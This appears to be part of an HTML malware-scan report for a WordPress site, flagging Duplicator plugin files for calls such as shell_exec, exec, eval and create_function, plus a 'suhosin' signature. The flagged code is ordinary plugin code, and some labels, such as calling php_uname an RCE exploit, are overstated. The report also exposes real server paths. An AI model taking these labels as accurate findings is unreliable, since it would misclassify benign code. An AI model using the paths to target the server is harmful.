</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_56").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/duplicator/installer/dup-installer/classes/class.server.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.32 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:27</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_57" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'echo&nbsp;duplicator'</span><span style="color: #007700">))&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">get_unzip_filepath</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">null</span><span style="color: #007700">;&nbsp;if&nbsp;(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">is_shell_exec_available</span><span style="color: #007700">())&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'hash&nbsp;unzip&nbsp;2&gt;&amp;1'</span><span style="color: #007700">)&nbsp;==&nbsp;</span><span style="color: #0000BB">NULL</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'unzip'</span><span style="color: #007700">;&nbsp;}&nbsp;else&nbsp;{&nbsp;</span><span style="color: #0000BB">$possible_paths&nbsp;</span><span style="color: #007700">=&nbsp;array(</span><span style="color: #DD0000">'/usr/bin/unzip'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'/opt/local/bin/unzip'</span><span style="color: #007700">);&nbsp;foreach&nbsp;(</span><span style="color: #0000BB">$possible_paths&nbsp;</span><span style="color: #007700">as&nbsp;</span><span style="color: #0000BB">$path</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">file_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$filepath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$path</span><span style="color: #007700">;&nbsp;break;&nbsp;}&nbsp;}&nbsp;}&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">$filepath</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">isWordPress</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$search_list&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">explode</span><span style="color: #007700">(</span><span style="color: #DD0000">','</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$wpCo</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 74</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_57").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/duplicator/installer/dup-installer/classes/Crypt/Base.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 98.92 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:27</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_58" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit php_uname <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2631</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">(</span><span style="color: #DD0000">'m'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$_action,&nbsp;&amp;$self,&nbsp;$_text'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$init_crypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'if&nbsp;($_action&nbsp;==&nbsp;"encrypt")&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$encrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;else&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$decrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}'</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;&amp;</span><span style="color: #0000BB">_getLambdaFunctions</span><span style="color: #007700">()&nbsp;{&nbsp;static&nbsp;</span><span style="color: #0000BB">$functions&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;return&nbsp;</span><span style="color: #0000BB">$functions</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">_hashInlineCryptFunction</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(!</span><span style="color: #0000BB">defined</span><span style="color: #007700">(</span><span style="color: #DD0000">'CRYPT_BASE_WHIRLPOOL_AVAILABLE'</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">define</span><span style="color: #007700">(</span><span style="color: #DD0000">'CRYPT_BASE_WHIRLPOOL_AVAILABLE'</span><span style="color: #007700">,&nbsp;(bool)(</span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'hash'</span><span style="color: #007700">)&nbsp;&amp;&amp;&nbsp;</span><span style="color: #0000BB">in_array</span><span style="color: #007700">(</span><span style="color: #DD0000">'whirlpool'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">hash_algos</span><span style="color: #007700">())));&nbsp;}&nbsp;</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$hash&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">;&nbsp;switch&nbsp;(</span><span style="color: #0000BB">true</span><span style="color: #007700">)&nbsp;{&nbsp;case&nbsp;</span><span style="color: #0000BB">CRYPT_BASE_WHIRL</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #DD0000">'$func&nbsp;=&nbsp;function&nbsp;($_action,&nbsp;&amp;$self,&nbsp;$_text)&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$init_crypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'if&nbsp;($_action&nbsp;==&nbsp;"encrypt")&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$encrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;else&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$decrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;};'</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$func</span><span style="color: #007700">;&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$_action,&nbsp;&amp;$self,&nbsp;$_text'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$init_crypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'if&nbsp;($_action&nbsp;==&nbsp;"encrypt")&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$encrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;else&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$decrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}'</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;&amp;</span><span style="color: #0000BB">_getLambdaFunctions</span><span style="color: #007700">()&nbsp;{&nbsp;static&nbsp;</span><span style="color: #0000BB">$functions&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;return&nbsp;</span><span style="color: #0000BB">$functions</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">_hashInlineCryptFunction</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(!</span><span style="color: #0000BB">defined</span><span style="color: #007700">(</span><span style="color: #DD0000">'CRYPT_BASE_WHIRLPOOL_AVAILABLE'</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">define</span><span style="color: #007700">(</span><span style="color: #DD0000">'CR...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_58").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/duplicator/installer/dup-installer/classes/config/class.constants.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.53 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:27</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_59" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_59").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/duplicator/classes/utilities/class.u.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 21.63 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:28</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 3</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_60" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'whoami'</span><span style="color: #007700">);&nbsp;}&nbsp;if&nbsp;(!</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$user</span><span style="color: #007700">)&nbsp;&amp;&amp;&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getpwuid'</span><span style="color: #007700">)&nbsp;&amp;&amp;&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_geteuid'</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(</span><span style="color: #0000BB">posix_geteuid</span><span style="color: #007700">());&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$user</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$user</span><span style="color: #007700">)&nbsp;?&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$unreadable</span><span style="color: #007700">;&nbsp;}&nbsp;catch&nbsp;(</span><span style="color: #0000BB">Exception&nbsp;$ex</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$unreadable</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">initSnapshotDirectory</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$path_wproot&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_WPROOTPATH</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$path_ssdir&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_SSDIR_PATH</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$path_plugin&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_PLUGIN_PATH</span><span style="color: #007700">);&nbsp;if&nbsp;(...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function posix_getpwuid <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `posix_getpwuid`</p><p><i>[<a href="https://www.php.net/posix_getpwuid" target="_blank" class="text-primary">https://www.php.net/posix_getpwuid</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(</span><span style="color: #0000BB">posix_geteuid</span><span style="color: #007700">());&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$user</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$user</span><span style="color: #007700">)&nbsp;?&nbsp;</span><span style="color: #0000BB">$user&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$unreadable</span><span style="color: #007700">;&nbsp;}&nbsp;catch&nbsp;(</span><span style="color: #0000BB">Exception&nbsp;$ex</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$unreadable</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">initSnapshotDirectory</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">$path_wproot&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_WPROOTPATH</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$path_ssdir&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_SSDIR_PATH</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$path_plugin&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_Util</span><span style="color: #007700">::</span><span style="color: #0000BB">safePath</span><span style="color: #007700">(</span><span style="color: #0000BB">DUPLICATOR_PLUGIN_PATH</span><span style="color: #007700">);&nbsp;if&nbsp;(!</span><span style="color: #0000BB">file_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$path_ssdir</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$old_root_perm&nbsp;</span><span style="color: #007700">=&nbsp;@</span><span style="color: #0000BB">fileperms</span><span style="color: #007700">(</span><span style="color: #0000BB">$path_wproot</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">DupLiteSnapLibIOU</span><span style="color: #007700">::</span><span style="color: #0000BB">chmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$path_wproot</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'u+rwx'</span><span style="color: #007700">);&nbsp;...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #DD0000">'echo&nbsp;duplicator'</span><span style="color: #007700">))&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">isWindows</span><span style="color: #007700">()&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">strtoupper</span><span style="color: #007700">(</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">PHP_OS</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">3</span><span style="color: #007700">))&nbsp;===&nbsp;</span><span style="color: #DD0000">'WIN'</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">installerUnscramble</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);&nbsp;}&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">installerScramble</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);&nbsp;}&nbsp;const&nbsp;</span><span style="color: #0000BB">SECURE_ISSUE_DIE&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'die'</span><span style="color: #007700">;&nbsp;const&nbsp;</span><span style="color: #0000BB">SECURE_ISSUE_THROW&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'throw'</span><span style="color: #007700">;&nbsp;const&nbsp;</span><span style="color: #0000BB">SECURE_ISSUE_RETURN&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'return'</span><span style="color: #007700">;&nbsp;public&nbsp;static&nbsp;function&nbsp;</span><span style="color: #0000BB">hasCapability</span><span style="color: #007700">(</span><span style="color: #0000BB">$permis</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 416</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_60").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/duplicator/classes/utilities/class.u.zip.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.23 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:28</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_61" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$command</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">!=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$errorMessage&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">DUP_U</span><span style="color: #007700">::</span><span style="color: #0000BB">__</span><span style="color: #007700">(</span><span style="color: #DD0000">"Error&nbsp;extracting&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$archiveFilepath</span><span style="color: #007700">}</span><span style="color: #DD0000">):&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$stderr</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;throw&nbsp;new&nbsp;</span><span style="color: #0000BB">Exception</span><span style="color: #007700">(</span><span style="color: #0000BB">$errorMessage</span><span style="color: #007700">);&nbsp;}&nbsp;}&nbsp;else&nbsp;{&nbsp;</span><span style="color: #0000BB">$zipArchive&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">ZipArchive</span><span style="color: #007700">();&nbsp;</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$zipArchive</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">open</span><span style="color: #007700">(</span><span style="color: #0000BB">$archiveFilepath</span><span style="color: #007700">);&nbsp;if(</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">!==&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">)&nbsp;{&nbsp;throw&nbsp;new&nbsp;</span><span style="color: #0000BB">Exception</span><span style="color: #007700">(</span><span style="color: #DD0000">"Error&nbsp;opening&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$archiveFilepath</span><span style="color: #007700">}</span><span style="color: #DD0000">&nbsp;when&nbsp;extracting.&nbsp;Error&nbsp;code:&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$retVal</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$zipArchive</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">extractTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$destinationDirectory</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$relativeFilesToExtract</span><span style="color: #007700">);&nbsp;if(</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">===&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">)&nbsp;{&nbsp;throw&nbsp;new&nbsp;</span><span style="color: #0000BB">Exception</span><span style="color: #007700">(</span><span style="color: #DD0000">"Error...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_61").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-content/plugins/duplicator/classes/package/class.pack.database.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 27.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:28</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:27</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_62" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$cmd</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$output</span><span style="color: #007700">)&nbsp;===&nbsp;</span><span style="color: #DD0000">'Warning:&nbsp;Using&nbsp;a&nbsp;password&nbsp;on&nbsp;the&nbsp;command&nbsp;line&nbsp;interface&nbsp;can&nbsp;be&nbsp;insecure.'</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$output&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">;&nbsp;}&nbsp;</span><span style="color: #0000BB">$output&nbsp;</span><span style="color: #007700">=&nbsp;(</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$output</span><span style="color: #007700">))&nbsp;?&nbsp;</span><span style="color: #0000BB">$output&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #DD0000">"Ran&nbsp;from&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">$exePath</span><span style="color: #007700">}</span><span style="color: #DD0000">"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$tblCreateCount&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">count</span><span style="color: 